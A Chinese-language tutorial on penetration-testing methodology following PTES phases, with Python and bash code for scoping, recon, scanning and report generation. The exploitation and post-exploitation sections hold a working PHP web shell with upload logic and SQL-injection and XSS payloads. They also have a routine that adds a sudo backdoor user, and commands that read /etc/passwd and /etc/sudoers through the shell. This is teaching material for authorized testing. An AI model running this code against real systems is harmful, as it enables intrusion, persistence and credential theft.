渗透测试方法论
渗透测试是一种通过模拟恶意攻击者的行为来评估系统安全性的方法。本文将详细介绍渗透测试的方法论、流程、工具和最佳实践。
渗透测试概述
什么是渗透测试
渗透测试(Penetration Testing,简称Pentest)是一种授权的模拟网络攻击,用于评估系统的安全性。通过模拟真实攻击者的行为,发现系统中的安全漏洞和弱点。
渗透测试的目标
- 发现安全漏洞:识别系统中的安全弱点
- 评估风险影响:评估漏洞被利用的潜在影响
- 验证安全控制:测试现有安全措施的有效性
- 提供修复建议:为发现的问题提供解决方案
- 合规要求:满足法规和标准的要求
渗透测试类型
按测试范围分类
- 网络渗透测试:测试网络基础设施
- Web应用渗透测试:测试Web应用程序
- 移动应用渗透测试:测试移动应用
- 无线网络渗透测试:测试无线网络安全
- 社会工程测试:测试人员安全意识
- 物理安全测试:测试物理访问控制
按测试方法分类
- 黑盒测试:测试者不了解系统内部结构
- 白盒测试:测试者完全了解系统内部结构
- 灰盒测试:测试者部分了解系统结构
渗透测试方法论框架
PTES(Penetration Testing Execution Standard)
PTES是业界广泛认可的渗透测试执行标准,包含以下阶段:
1. 前期交互(Pre-engagement Interactions)
# 渗透测试项目管理模板
class PenetrationTestProject:
def __init__(self):
self.project_info = {
'client_name': '',
'project_scope': [],
'test_type': '', # black-box, white-box, gray-box
'start_date': '',
'end_date': '',
'authorized_personnel': [],
'emergency_contacts': [],
'rules_of_engagement': []
}
self.scope_definition = {
'in_scope_assets': [],
'out_of_scope_assets': [],
'testing_windows': [],
'restrictions': [],
'success_criteria': []
}
def create_statement_of_work(self):
"""创建工作说明书"""
sow = f"""
# 渗透测试工作说明书
## 项目概述
- 客户:{self.project_info['client_name']}
- 测试类型:{self.project_info['test_type']}
- 测试时间:{self.project_info['start_date']} 至 {self.project_info['end_date']}
## 测试范围
### 包含范围
{chr(10).join([f'- {asset}' for asset in self.scope_definition['in_scope_assets']])}
### 排除范围
{chr(10).join([f'- {asset}' for asset in self.scope_definition['out_of_scope_assets']])}
## 测试限制
{chr(10).join([f'- {restriction}' for restriction in self.scope_definition['restrictions']])}
## 交付成果
- 渗透测试报告
- 漏洞详细说明
- 修复建议
- 执行摘要
"""
return sow
def generate_rules_of_engagement(self):
"""生成交战规则"""
roe = {
'authorized_testing_methods': [
'Network scanning',
'Vulnerability assessment',
'Web application testing',
'Social engineering (if approved)'
],
'prohibited_activities': [
'Denial of Service attacks',
'Data destruction or modification',
'Physical breaking and entering',
'Testing during business hours (unless approved)'
],
'escalation_procedures': [
'Immediate notification for critical findings',
'Daily status updates',
'Emergency contact procedures'
]
}
return roe
2. 情报收集(Intelligence Gathering)
# 信息收集自动化工具
import subprocess
import requests
import dns.resolver
import whois
from bs4 import BeautifulSoup
import json
class IntelligenceGathering:
def __init__(self, target_domain):
self.target = target_domain
self.gathered_info = {
'domain_info': {},
'subdomains': [],
'ip_addresses': [],
'technologies': [],
'employees': [],
'email_addresses': [],
'social_media': []
}
def passive_reconnaissance(self):
"""被动信息收集"""
print(f"Starting passive reconnaissance for {self.target}")
# WHOIS查询
self.whois_lookup()
# DNS枚举
self.dns_enumeration()
# 搜索引擎信息收集
self.search_engine_reconnaissance()
# 社交媒体信息收集
self.social_media_reconnaissance()
return self.gathered_info
def whois_lookup(self):
"""WHOIS查询"""
try:
domain_info = whois.whois(self.target)
self.gathered_info['domain_info'] = {
'registrar': domain_info.registrar,
'creation_date': str(domain_info.creation_date),
'expiration_date': str(domain_info.expiration_date),
'name_servers': domain_info.name_servers,
'emails': domain_info.emails
}
except Exception as e:
print(f"WHOIS lookup failed: {e}")
def dns_enumeration(self):
"""DNS枚举"""
record_types = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'CNAME']
for record_type in record_types:
try:
answers = dns.resolver.resolve(self.target, record_type)
for answer in answers:
if record_type == 'A':
self.gathered_info['ip_addresses'].append(str(answer))
elif record_type == 'MX':
self.gathered_info['subdomains'].append(str(answer).split()[-1])
except:
continue
def subdomain_enumeration(self):
"""子域名枚举"""
common_subdomains = [
'www', 'mail', 'ftp', 'admin', 'test', 'dev', 'staging',
'api', 'blog', 'shop', 'support', 'portal', 'vpn'
]
for subdomain in common_subdomains:
full_domain = f"{subdomain}.{self.target}"
try:
answers = dns.resolver.resolve(full_domain, 'A')
self.gathered_info['subdomains'].append(full_domain)
for answer in answers:
self.gathered_info['ip_addresses'].append(str(answer))
except:
continue
def search_engine_reconnaissance(self):
"""搜索引擎信息收集"""
# Google Dorking
google_dorks = [
f'site:{self.target}',
f'site:{self.target} filetype:pdf',
f'site:{self.target} inurl:admin',
f'site:{self.target} intitle:"index of"',
f'"{self.target}" email'
]
# 注意:实际实现需要处理搜索引擎的反爬虫机制
print("Google Dorks to manually check:")
for dork in google_dorks:
print(f" - {dork}")
def technology_fingerprinting(self, url):
"""技术指纹识别"""
try:
response = requests.get(url, timeout=10)
# 分析HTTP头
headers = response.headers
if 'Server' in headers:
self.gathered_info['technologies'].append(f"Server: {headers['Server']}")
if 'X-Powered-By' in headers:
self.gathered_info['technologies'].append(f"Powered by: {headers['X-Powered-By']}")
# 分析页面内容
soup = BeautifulSoup(response.content, 'html.parser')
# 检测CMS
if soup.find('meta', {'name': 'generator'}):
generator = soup.find('meta', {'name': 'generator'})['content']
self.gathered_info['technologies'].append(f"CMS: {generator}")
# 检测JavaScript框架
scripts = soup.find_all('script', src=True)
for script in scripts:
src = script['src']
if 'jquery' in src.lower():
self.gathered_info['technologies'].append("JavaScript: jQuery")
elif 'angular' in src.lower():
self.gathered_info['technologies'].append("JavaScript: Angular")
elif 'react' in src.lower():
self.gathered_info['technologies'].append("JavaScript: React")
except Exception as e:
print(f"Technology fingerprinting failed: {e}")
3. 威胁建模(Threat Modeling)
# 威胁建模框架
class ThreatModeling:
def __init__(self, target_system):
self.target = target_system
self.assets = []
self.threats = []
self.vulnerabilities = []
self.attack_vectors = []
def identify_assets(self):
"""识别资产"""
asset_categories = {
'data': ['customer_data', 'financial_records', 'intellectual_property'],
'systems': ['web_servers', 'databases', 'network_devices'],
'applications': ['web_apps', 'mobile_apps', 'desktop_apps'],
'infrastructure': ['networks', 'cloud_services', 'physical_facilities']
}
for category, items in asset_categories.items():
for item in items:
asset = {
'name': item,
'category': category,
'criticality': self.assess_asset_criticality(item),
'value': self.assess_asset_value(item)
}
self.assets.append(asset)
return self.assets
def identify_threats(self):
"""识别威胁"""
threat_categories = {
'external_attackers': {
'description': 'External malicious actors',
'capabilities': ['network_attacks', 'web_attacks', 'social_engineering'],
'motivations': ['financial_gain', 'data_theft', 'reputation_damage']
},
'internal_threats': {
'description': 'Malicious or negligent insiders',
'capabilities': ['privileged_access', 'data_access', 'system_knowledge'],
'motivations': ['financial_gain', 'revenge', 'negligence']
},
'nation_state': {
'description': 'State-sponsored attackers',
'capabilities': ['advanced_techniques', 'zero_day_exploits', 'persistent_access'],
'motivations': ['espionage', 'sabotage', 'intelligence_gathering']
}
}
for threat_type, details in threat_categories.items():
threat = {
'type': threat_type,
'description': details['description'],
'capabilities': details['capabilities'],
'motivations': details['motivations'],
'likelihood': self.assess_threat_likelihood(threat_type)
}
self.threats.append(threat)
return self.threats
def map_attack_vectors(self):
"""映射攻击向量"""
attack_vectors = [
{
'name': 'Web Application Attacks',
'techniques': ['SQL Injection', 'XSS', 'CSRF', 'Authentication Bypass'],
'entry_points': ['login_forms', 'search_functions', 'file_uploads'],
'impact': 'high'
},
{
'name': 'Network Attacks',
'techniques': ['Port Scanning', 'Service Exploitation', 'Man-in-the-Middle'],
'entry_points': ['open_ports', 'network_services', 'wireless_networks'],
'impact': 'medium'
},
{
'name': 'Social Engineering',
'techniques': ['Phishing', 'Pretexting', 'Physical Access'],
'entry_points': ['email', 'phone', 'physical_locations'],
'impact': 'high'
}
]
self.attack_vectors = attack_vectors
return attack_vectors
def create_attack_trees(self):
"""创建攻击树"""
attack_tree = {
'goal': 'Compromise Target System',
'sub_goals': [
{
'name': 'Gain Initial Access',
'methods': [
'Exploit Web Vulnerability',
'Phishing Attack',
'Brute Force Authentication'
]
},
{
'name': 'Escalate Privileges',
'methods': [
'Local Privilege Escalation',
'Credential Harvesting',
'Exploit Misconfiguration'
]
},
{
'name': 'Maintain Persistence',
'methods': [
'Install Backdoor',
'Create Rogue Account',
'Modify System Files'
]
},
{
'name': 'Achieve Objective',
'methods': [
'Data Exfiltration',
'System Disruption',
'Lateral Movement'
]
}
]
}
return attack_tree
4. 漏洞分析(Vulnerability Analysis)
# 漏洞扫描和分析工具
import nmap
import requests
from urllib.parse import urljoin, urlparse
import ssl
import socket
class VulnerabilityAnalysis:
def __init__(self, targets):
self.targets = targets if isinstance(targets, list) else [targets]
self.vulnerabilities = []
self.scan_results = {}
def network_vulnerability_scan(self):
"""网络漏洞扫描"""
nm = nmap.PortScanner()
for target in self.targets:
print(f"Scanning {target}...")
# 端口扫描
nm.scan(target, '1-65535', '-sS -sV -O --script vuln')
for host in nm.all_hosts():
host_info = {
'host': host,
'state': nm[host].state(),
'protocols': [],
'vulnerabilities': []
}
for protocol in nm[host].all_protocols():
ports = nm[host][protocol].keys()
for port in ports:
port_info = nm[host][protocol][port]
service_info = {
'port': port,
'state': port_info['state'],
'name': port_info['name'],
'version': port_info.get('version', ''),
'product': port_info.get('product', '')
}
# 检查已知漏洞
vulns = self.check_service_vulnerabilities(service_info)
host_info['vulnerabilities'].extend(vulns)
host_info['protocols'].append(service_info)
self.scan_results[host] = host_info
return self.scan_results
def web_vulnerability_scan(self, base_url):
"""Web应用漏洞扫描"""
web_vulns = []
# SQL注入测试
sql_vulns = self.test_sql_injection(base_url)
web_vulns.extend(sql_vulns)
# XSS测试
xss_vulns = self.test_xss(base_url)
web_vulns.extend(xss_vulns)
# 目录遍历测试
dir_vulns = self.test_directory_traversal(base_url)
web_vulns.extend(dir_vulns)
# SSL/TLS配置测试
ssl_vulns = self.test_ssl_configuration(base_url)
web_vulns.extend(ssl_vulns)
return web_vulns
def test_sql_injection(self, base_url):
"""SQL注入测试"""
sql_payloads = [
"'",
"' OR '1'='1",
"' OR '1'='1' --",
"' OR '1'='1' /*",
"'; DROP TABLE users; --",
"1' UNION SELECT NULL,NULL,NULL--"
]
vulnerabilities = []
# 查找表单
try:
response = requests.get(base_url)
from bs4 import BeautifulSoup
soup = BeautifulSoup(response.content, 'html.parser')
forms = soup.find_all('form')
for form in forms:
action = form.get('action', '')
method = form.get('method', 'get').lower()
target_url = urljoin(base_url, action)
inputs = form.find_all('input')
for input_field in inputs:
if input_field.get('type') in ['text', 'search', 'email']:
field_name = input_field.get('name', '')
for payload in sql_payloads:
vuln = self.test_sql_payload(target_url, field_name, payload, method)
if vuln:
vulnerabilities.append(vuln)
break # 找到一个就够了
except Exception as e:
print(f"SQL injection test failed: {e}")
return vulnerabilities
def test_sql_payload(self, url, param, payload, method):
"""测试SQL注入载荷"""
try:
if method == 'post':
data = {param: payload}
response = requests.post(url, data=data, timeout=10)
else:
params = {param: payload}
response = requests.get(url, params=params, timeout=10)
# 检查SQL错误信息
error_patterns = [
'mysql_fetch_array',
'ORA-01756',
'Microsoft OLE DB Provider',
'SQLServer JDBC Driver',
'PostgreSQL query failed',
'sqlite3.OperationalError'
]
for pattern in error_patterns:
if pattern.lower() in response.text.lower():
return {
'type': 'SQL Injection',
'severity': 'High',
'url': url,
'parameter': param,
'payload': payload,
'evidence': pattern
}
except Exception as e:
pass
return None
def test_xss(self, base_url):
"""XSS测试"""
xss_payloads = [
'<script>alert("XSS")</script>',
'<img src=x onerror=alert("XSS")>',
'<svg onload=alert("XSS")>',
'javascript:alert("XSS")',
'"><script>alert("XSS")</script>'
]
vulnerabilities = []
try:
response = requests.get(base_url)
from bs4 import BeautifulSoup
soup = BeautifulSoup(response.content, 'html.parser')
forms = soup.find_all('form')
for form in forms:
action = form.get('action', '')
method = form.get('method', 'get').lower()
target_url = urljoin(base_url, action)
inputs = form.find_all('input')
for input_field in inputs:
if input_field.get('type') in ['text', 'search', 'email']:
field_name = input_field.get('name', '')
for payload in xss_payloads:
vuln = self.test_xss_payload(target_url, field_name, payload, method)
if vuln:
vulnerabilities.append(vuln)
break
except Exception as e:
print(f"XSS test failed: {e}")
return vulnerabilities
def test_ssl_configuration(self, url):
"""SSL/TLS配置测试"""
vulnerabilities = []
try:
parsed_url = urlparse(url)
if parsed_url.scheme == 'https':
hostname = parsed_url.hostname
port = parsed_url.port or 443
# 检查SSL证书
context = ssl.create_default_context()
with socket.create_connection((hostname, port)) as sock:
with context.wrap_socket(sock, server_hostname=hostname) as ssock:
cert = ssock.getpeercert()
# 检查证书有效期
import datetime
not_after = datetime.datetime.strptime(cert['notAfter'], '%b %d %H:%M:%S %Y %Z')
if not_after < datetime.datetime.now():
vulnerabilities.append({
'type': 'Expired SSL Certificate',
'severity': 'High',
'url': url,
'details': f'Certificate expired on {not_after}'
})
# 检查弱加密套件
cipher = ssock.cipher()
if cipher and 'RC4' in cipher[0]:
vulnerabilities.append({
'type': 'Weak SSL Cipher',
'severity': 'Medium',
'url': url,
'details': f'Weak cipher: {cipher[0]}'
})
except Exception as e:
print(f"SSL test failed: {e}")
return vulnerabilities
5. 漏洞利用(Exploitation)
# 漏洞利用框架
class ExploitationFramework:
def __init__(self):
self.exploits = []
self.successful_exploits = []
self.shells = []
def sql_injection_exploit(self, target_url, vulnerable_param):
"""SQL注入利用"""
exploit_info = {
'type': 'SQL Injection',
'target': target_url,
'parameter': vulnerable_param,
'status': 'attempting'
}
try:
# 尝试获取数据库版本
version_payload = "' UNION SELECT @@version,NULL,NULL--"
params = {vulnerable_param: version_payload}
response = requests.get(target_url, params=params)
if 'mysql' in response.text.lower():
exploit_info['database'] = 'MySQL'
# 尝试获取数据库名
db_payload = "' UNION SELECT database(),NULL,NULL--"
params = {vulnerable_param: db_payload}
response = requests.get(target_url, params=params)
# 解析响应获取数据库名
# 这里需要根据实际响应格式解析
exploit_info['status'] = 'successful'
exploit_info['data_extracted'] = 'Database information'
elif 'oracle' in response.text.lower():
exploit_info['database'] = 'Oracle'
# Oracle特定的利用逻辑
except Exception as e:
exploit_info['status'] = 'failed'
exploit_info['error'] = str(e)
self.exploits.append(exploit_info)
if exploit_info['status'] == 'successful':
self.successful_exploits.append(exploit_info)
return exploit_info
def web_shell_upload(self, target_url, upload_endpoint):
"""Web Shell上传"""
shell_code = '''
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
<form method="GET">
<input type="text" name="cmd" placeholder="Enter command">
<input type="submit" value="Execute">
</form>
'''
exploit_info = {
'type': 'Web Shell Upload',
'target': target_url,
'endpoint': upload_endpoint,
'status': 'attempting'
}
try:
# 尝试上传PHP shell
files = {'file': ('shell.php', shell_code, 'application/x-php')}
response = requests.post(upload_endpoint, files=files)
if response.status_code == 200:
# 尝试访问上传的shell
shell_url = urljoin(target_url, 'uploads/shell.php')
test_response = requests.get(shell_url, params={'cmd': 'whoami'})
if test_response.status_code == 200 and 'www-data' in test_response.text:
exploit_info['status'] = 'successful'
exploit_info['shell_url'] = shell_url
self.shells.append(shell_url)
else:
exploit_info['status'] = 'failed'
exploit_info['error'] = 'Shell upload failed or not accessible'
except Exception as e:
exploit_info['status'] = 'failed'
exploit_info['error'] = str(e)
self.exploits.append(exploit_info)
if exploit_info['status'] == 'successful':
self.successful_exploits.append(exploit_info)
return exploit_info
def privilege_escalation(self, shell_url):
"""权限提升"""
escalation_info = {
'type': 'Privilege Escalation',
'shell': shell_url,
'status': 'attempting'
}
try:
# 检查当前用户
response = requests.get(shell_url, params={'cmd': 'whoami'})
current_user = response.text.strip()
if 'root' in current_user:
escalation_info['status'] = 'not_needed'
escalation_info['current_user'] = current_user
return escalation_info
# 尝试常见的权限提升方法
escalation_commands = [
'sudo -l', # 检查sudo权限
'find / -perm -u=s -type f 2>/dev/null', # 查找SUID文件
'crontab -l', # 检查计划任务
'cat /etc/passwd', # 查看用户信息
]
for cmd in escalation_commands:
response = requests.get(shell_url, params={'cmd': cmd})
# 分析响应寻找权限提升机会
if 'NOPASSWD' in response.text:
escalation_info['method'] = 'sudo_nopasswd'
escalation_info['status'] = 'possible'
break
elif '/bin/bash' in response.text and 'root' in response.text:
escalation_info['method'] = 'suid_binary'
escalation_info['status'] = 'possible'
break
except Exception as e:
escalation_info['status'] = 'failed'
escalation_info['error'] = str(e)
return escalation_info
6. 后渗透(Post Exploitation)
# 后渗透活动框架
class PostExploitation:
def __init__(self, compromised_systems):
self.systems = compromised_systems
self.collected_data = []
self.persistence_methods = []
self.lateral_movement = []
def establish_persistence(self, shell_url):
"""建立持久化"""
persistence_methods = [
self.create_backdoor_user,
self.install_ssh_key,
self.create_cron_job,
self.modify_startup_script
]
for method in persistence_methods:
try:
result = method(shell_url)
if result['status'] == 'successful':
self.persistence_methods.append(result)
break # 一种方法成功即可
except Exception as e:
print(f"Persistence method failed: {e}")
def create_backdoor_user(self, shell_url):
"""创建后门用户"""
commands = [
'useradd -m -s /bin/bash backdoor',
'echo "backdoor:password123" | chpasswd',
'usermod -aG sudo backdoor'
]
for cmd in commands:
response = requests.get(shell_url, params={'cmd': cmd})
if 'permission denied' in response.text.lower():
return {'status': 'failed', 'method': 'backdoor_user', 'error': 'insufficient_privileges'}
return {'status': 'successful', 'method': 'backdoor_user', 'username': 'backdoor'}
def data_collection(self, shell_url):
"""数据收集"""
collection_commands = {
'system_info': 'uname -a',
'network_config': 'ifconfig',
'running_processes': 'ps aux',
'installed_software': 'dpkg -l',
'user_accounts': 'cat /etc/passwd',
'sudo_config': 'cat /etc/sudoers',
'ssh_keys': 'find /home -name "*.ssh" -type d',
'database_files': 'find / -name "*.db" -o -name "*.sql" 2>/dev/null',
'config_files': 'find /etc -name "*.conf" 2>/dev/null | head -20'
}
collected_info = {}
for info_type, command in collection_commands.items():
try:
response = requests.get(shell_url, params={'cmd': command})
collected_info[info_type] = response.text
except Exception as e:
collected_info[info_type] = f"Collection failed: {e}"
self.collected_data.append({
'system': shell_url,
'timestamp': datetime.now().isoformat(),
'data': collected_info
})
return collected_info
def lateral_movement(self, shell_url):
"""横向移动"""
movement_info = {
'source': shell_url,
'targets': [],
'successful_moves': []
}
# 发现网络中的其他主机
network_discovery_commands = [
'arp -a',
'netstat -rn',
'nmap -sn 192.168.1.0/24'
]
discovered_hosts = []
for cmd in network_discovery_commands:
try:
response = requests.get(shell_url, params={'cmd': cmd})
# 解析响应提取IP地址
import re
ip_pattern = r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b'
ips = re.findall(ip_pattern, response.text)
discovered_hosts.extend(ips)
except:
continue
# 去重
discovered_hosts = list(set(discovered_hosts))
movement_info['targets'] = discovered_hosts
# 尝试横向移动
for target_ip in discovered_hosts[:5]: # 限制尝试数量
move_result = self.attempt_lateral_move(shell_url, target_ip)
if move_result['status'] == 'successful':
movement_info['successful_moves'].append(move_result)
self.lateral_movement.append(movement_info)
return movement_info
def attempt_lateral_move(self, shell_url, target_ip):
"""尝试横向移动到目标主机"""
move_methods = [
self.ssh_key_reuse,
self.credential_reuse,
self.exploit_service
]
for method in move_methods:
try:
result = method(shell_url, target_ip)
if result['status'] == 'successful':
return result
except:
continue
return {'status': 'failed', 'target': target_ip}
def generate_post_exploitation_report(self):
"""生成后渗透报告"""
report = {
'summary': {
'compromised_systems': len(self.systems),
'persistence_established': len(self.persistence_methods),
'data_collected': len(self.collected_data),
'lateral_movement_attempts': len(self.lateral_movement)
},
'persistence_methods': self.persistence_methods,
'collected_data': self.collected_data,
'lateral_movement': self.lateral_movement,
'recommendations': self.generate_remediation_recommendations()
}
return report
def generate_remediation_recommendations(self):
"""生成修复建议"""
recommendations = [
'Patch all identified vulnerabilities immediately',
'Implement network segmentation to prevent lateral movement',
'Deploy endpoint detection and response (EDR) solutions',
'Conduct regular security awareness training',
'Implement multi-factor authentication',
'Regular security assessments and penetration testing'
]
return recommendations
渗透测试工具
网络扫描工具
#!/bin/bash
# 网络扫描脚本
TARGET=$1
OUTPUT_DIR="pentest_results_$(date +%Y%m%d_%H%M%S)"
if [ -z "$TARGET" ]; then
echo "Usage: $0 <target_ip_or_range>"
exit 1
fi
mkdir -p $OUTPUT_DIR
echo "[+] Starting network reconnaissance for $TARGET"
# Nmap扫描
echo "[+] Running Nmap scans..."
nmap -sS -sV -O -A --script vuln $TARGET -oA $OUTPUT_DIR/nmap_scan
# 端口扫描
echo "[+] Running detailed port scan..."
nmap -p- --min-rate 1000 $TARGET -oA $OUTPUT_DIR/full_port_scan
# UDP扫描
echo "[+] Running UDP scan..."
nmap -sU --top-ports 1000 $TARGET -oA $OUTPUT_DIR/udp_scan
# 服务枚举
echo "[+] Running service enumeration..."
nmap -sC -sV -p $(nmap -p- --min-rate=1000 -T4 $TARGET | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) $TARGET -oA $OUTPUT_DIR/service_enum
echo "[+] Network scanning completed. Results saved in $OUTPUT_DIR"
Web应用测试工具
# Web应用安全测试工具
import requests
from urllib.parse import urljoin, urlparse
from bs4 import BeautifulSoup
import threading
import time
class WebApplicationTester:
def __init__(self, target_url):
self.target = target_url
self.session = requests.Session()
self.found_urls = set()
self.vulnerabilities = []
# 设置User-Agent
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
})
def crawl_website(self, max_depth=3):
"""网站爬取"""
urls_to_crawl = [(self.target, 0)]
crawled_urls = set()
while urls_to_crawl:
current_url, depth = urls_to_crawl.pop(0)
if current_url in crawled_urls or depth > max_depth:
continue
try:
response = self.session.get(current_url, timeout=10)
crawled_urls.add(current_url)
self.found_urls.add(current_url)
if response.headers.get('content-type', '').startswith('text/html'):
soup = BeautifulSoup(response.content, 'html.parser')
# 提取链接
for link in soup.find_all('a', href=True):
href = link['href']
full_url = urljoin(current_url, href)
# 只爬取同域名的链接
if urlparse(full_url).netloc == urlparse(self.target).netloc:
urls_to_crawl.append((full_url, depth + 1))
# 提取表单
forms = soup.find_all('form')
for form in forms:
self.analyze_form(current_url, form)
except Exception as e:
print(f"Error crawling {current_url}: {e}")
return list(self.found_urls)
def analyze_form(self, page_url, form):
"""分析表单"""
action = form.get('action', '')
method = form.get('method', 'get').lower()
form_url = urljoin(page_url, action)
inputs = form.find_all('input')
form_data = {}
for input_field in inputs:
name = input_field.get('name', '')
input_type = input_field.get('type', 'text')
value = input_field.get('value', '')
if input_type not in ['submit', 'button', 'hidden']:
form_data[name] = value or 'test'
# 测试表单
self.test_form_vulnerabilities(form_url, form_data, method)
def test_form_vulnerabilities(self, form_url, form_data, method):
"""测试表单漏洞"""
# SQL注入测试
self.test_sql_injection_form(form_url, form_data, method)
# XSS测试
self.test_xss_form(form_url, form_data, method)
# CSRF测试
self.test_csrf(form_url, form_data, method)
def directory_bruteforce(self):
"""目录暴力破解"""
common_dirs = [
'admin', 'administrator', 'login', 'wp-admin', 'phpmyadmin',
'backup', 'test', 'dev', 'staging', 'api', 'uploads',
'images', 'css', 'js', 'includes', 'config', 'database'
]
common_files = [
'robots.txt', 'sitemap.xml', '.htaccess', 'web.config',
'config.php', 'database.php', 'wp-config.php', 'readme.txt',
'changelog.txt', 'version.txt', 'phpinfo.php'
]
found_resources = []
# 测试目录
for directory in common_dirs:
url = urljoin(self.target, directory + '/')
try:
response = self.session.get(url, timeout=5)
if response.status_code == 200:
found_resources.append({
'type': 'directory',
'url': url,
'status_code': response.status_code
})
except:
continue
# 测试文件
for filename in common_files:
url = urljoin(self.target, filename)
try:
response = self.session.get(url, timeout=5)
if response.status_code == 200:
found_resources.append({
'type': 'file',
'url': url,
'status_code': response.status_code,
'size': len(response.content)
})
except:
continue
return found_resources
def run_comprehensive_test(self):
"""运行综合测试"""
print(f"[+] Starting comprehensive test for {self.target}")
# 网站爬取
print("[+] Crawling website...")
crawled_urls = self.crawl_website()
print(f"[+] Found {len(crawled_urls)} URLs")
# 目录暴力破解
print("[+] Directory bruteforcing...")
found_resources = self.directory_bruteforce()
print(f"[+] Found {len(found_resources)} additional resources")
# 生成报告
report = {
'target': self.target,
'crawled_urls': crawled_urls,
'found_resources': found_resources,
'vulnerabilities': self.vulnerabilities,
'timestamp': time.strftime('%Y-%m-%d %H:%M:%S')
}
return report
渗透测试报告
报告结构模板
# 渗透测试报告生成器
from datetime import datetime
import json
class PenetrationTestReport:
def __init__(self, project_info):
self.project_info = project_info
self.executive_summary = ""
self.vulnerabilities = []
self.recommendations = []
self.appendices = []
def generate_executive_summary(self, findings):
"""生成执行摘要"""
critical_count = len([v for v in findings if v['severity'] == 'Critical'])
high_count = len([v for v in findings if v['severity'] == 'High'])
medium_count = len([v for v in findings if v['severity'] == 'Medium'])
low_count = len([v for v in findings if v['severity'] == 'Low'])
self.executive_summary = f"""
# 执行摘要
## 测试概述
本次渗透测试于{self.project_info['start_date']}至{self.project_info['end_date']}期间对{self.project_info['target']}进行了全面的安全评估。
## 主要发现
测试过程中共发现{len(findings)}个安全问题:
- 严重漏洞:{critical_count}个
- 高危漏洞:{high_count}个
- 中危漏洞:{medium_count}个
- 低危漏洞:{low_count}个
## 风险评估
{'系统存在严重安全风险,建议立即采取修复措施。' if critical_count > 0 else '系统整体安全状况良好,建议按优先级修复发现的问题。'}
## 建议优先级
1. 立即修复所有严重和高危漏洞
2. 在下一个维护窗口修复中危漏洞
3. 制定计划逐步修复低危漏洞
4. 建立定期安全评估机制
"""
def add_vulnerability(self, vuln_info):
"""添加漏洞信息"""
vulnerability = {
'id': f"VULN-{len(self.vulnerabilities) + 1:03d}",
'title': vuln_info['title'],
'severity': vuln_info['severity'],
'cvss_score': vuln_info.get('cvss_score', 0),
'description': vuln_info['description'],
'impact': vuln_info['impact'],
'affected_systems': vuln_info['affected_systems'],
'proof_of_concept': vuln_info.get('proof_of_concept', ''),
'remediation': vuln_info['remediation'],
'references': vuln_info.get('references', [])
}
self.vulnerabilities.append(vulnerability)
def generate_vulnerability_details(self):
"""生成漏洞详情"""
details = "# 漏洞详情\n\n"
# 按严重性排序
severity_order = {'Critical': 0, 'High': 1, 'Medium': 2, 'Low': 3}
sorted_vulns = sorted(self.vulnerabilities,
key=lambda x: severity_order.get(x['severity'], 4))
for vuln in sorted_vulns:
details += f"""
## {vuln['id']}: {vuln['title']}
**严重性**: {vuln['severity']} (CVSS: {vuln['cvss_score']})
**影响系统**: {', '.join(vuln['affected_systems'])}
### 描述
{vuln['description']}
### 影响
{vuln['impact']}
### 复现步骤
{vuln['proof_of_concept']}
### 修复建议
{vuln['remediation']}
### 参考资料
{chr(10).join([f'- {ref}' for ref in vuln['references']])}
---
"""
return details
def generate_full_report(self):
"""生成完整报告"""
report = f"""
# 渗透测试报告
**项目**: {self.project_info['project_name']}
**客户**: {self.project_info['client_name']}
**测试日期**: {self.project_info['start_date']} - {self.project_info['end_date']}
**报告日期**: {datetime.now().strftime('%Y-%m-%d')}
**测试人员**: {', '.join(self.project_info['testers'])}
{self.executive_summary}
# 测试方法
本次渗透测试采用了以下方法:
- 信息收集和侦察
- 漏洞扫描和分析
- 漏洞利用和验证
- 后渗透测试
- 风险评估和报告
测试遵循OWASP测试指南和PTES标准,确保测试的全面性和准确性。
{self.generate_vulnerability_details()}
# 总体建议
## 短期建议(1-30天)
- 立即修复所有严重和高危漏洞
- 实施临时缓解措施
- 加强监控和日志记录
## 中期建议(1-3个月)
- 修复中危漏洞
- 实施安全培训计划
- 建立漏洞管理流程
## 长期建议(3-12个月)
- 建立定期安全评估机制
- 实施安全开发生命周期
- 持续改进安全态势
# 结论
本次渗透测试全面评估了目标系统的安全状况,发现了多个需要关注的安全问题。建议客户按照优先级逐步修复这些问题,并建立持续的安全改进机制。
我们建议在修复完成后进行复测,以验证修复效果。同时,建议建立定期的安全评估机制,以持续监控和改进系统的安全状况。
"""
return report
def export_report(self, format='markdown'):
"""导出报告"""
report_content = self.generate_full_report()
if format == 'markdown':
filename = f"pentest_report_{datetime.now().strftime('%Y%m%d')}.md"
with open(filename, 'w', encoding='utf-8') as f:
f.write(report_content)
elif format == 'json':
filename = f"pentest_report_{datetime.now().strftime('%Y%m%d')}.json"
report_data = {
'project_info': self.project_info,
'executive_summary': self.executive_summary,
'vulnerabilities': self.vulnerabilities,
'generated_at': datetime.now().isoformat()
}
with open(filename, 'w', encoding='utf-8') as f:
json.dump(report_data, f, indent=2, ensure_ascii=False)
return filename
# 使用示例
project_info = {
'project_name': 'Web Application Security Assessment',
'client_name': 'Example Corp',
'target': 'https://example.com',
'start_date': '2023-10-01',
'end_date': '2023-10-05',
'testers': ['Security Analyst 1', 'Security Analyst 2']
}
report = PenetrationTestReport(project_info)
# 添加漏洞
report.add_vulnerability({
'title': 'SQL Injection in Login Form',
'severity': 'High',
'cvss_score': 8.1,
'description': 'The login form is vulnerable to SQL injection attacks.',
'impact': 'An attacker could bypass authentication and access sensitive data.',
'affected_systems': ['https://example.com/login.php'],
'proof_of_concept': '1. Navigate to login form\n2. Enter payload: admin\' OR 1=1--\n3. Observe successful login',
'remediation': 'Use parameterized queries and input validation.',
'references': ['https://owasp.org/www-community/attacks/SQL_Injection']
})
# 生成报告
report.generate_executive_summary(report.vulnerabilities)
report_file = report.export_report('markdown')
print(f"Report generated: {report_file}")
最佳实践和注意事项
法律和道德考虑
- 授权测试:确保获得明确的书面授权
- 范围限制:严格遵守测试范围和限制
- 数据保护:保护客户敏感信息
- 负责任披露:遵循负责任的漏洞披露原则
技术最佳实践
- 全面测试:覆盖所有可能的攻击向量
- 文档记录:详细记录测试过程和发现
- 验证漏洞:确保发现的漏洞是真实可利用的
- 风险评估:准确评估漏洞的风险等级
报告质量
